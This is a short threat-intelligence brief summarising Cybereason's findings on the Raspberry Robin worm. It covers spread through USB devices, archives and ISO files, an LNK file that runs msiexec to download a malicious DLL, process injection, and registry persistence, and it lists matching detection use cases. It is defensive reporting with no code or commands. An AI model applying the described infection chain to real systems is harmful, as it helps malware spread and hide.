Researchers Found Infection Chain in USB Devices and Shared Folders
Researchers Found Infection Chain in USB Devices and Shared Folders
Industry: N/A | Level: Tactical | Source: Cybereason
Cybereason shared an infection chain involving Raspberry Robin, a malware worm that is often distributed through infected USB devices or shared folders. Although, the method is commonly observed to infect victims through Microsoft shortcut/LNK files, the delivery method has varied "through file archives, removable devices (USB) or ISO files." The LNK file calls on the Windows command shell to spawn msiexec.exe to proxy a download of a malicious DLL file. To maintain stealth the malware will inject itself into three processes often rundll32.exe, regsvr32.exe, and dllhost.exe. Persistence is established through the registry run key.
Anvilogic Scenario:
- Raspberry Robin Abuses MsiExec
Anvilogic Use Cases:
- Compressed File Execution
- Symbolic OR Hard File Link Created
- Msiexec Abuse
- Rare Remote Thread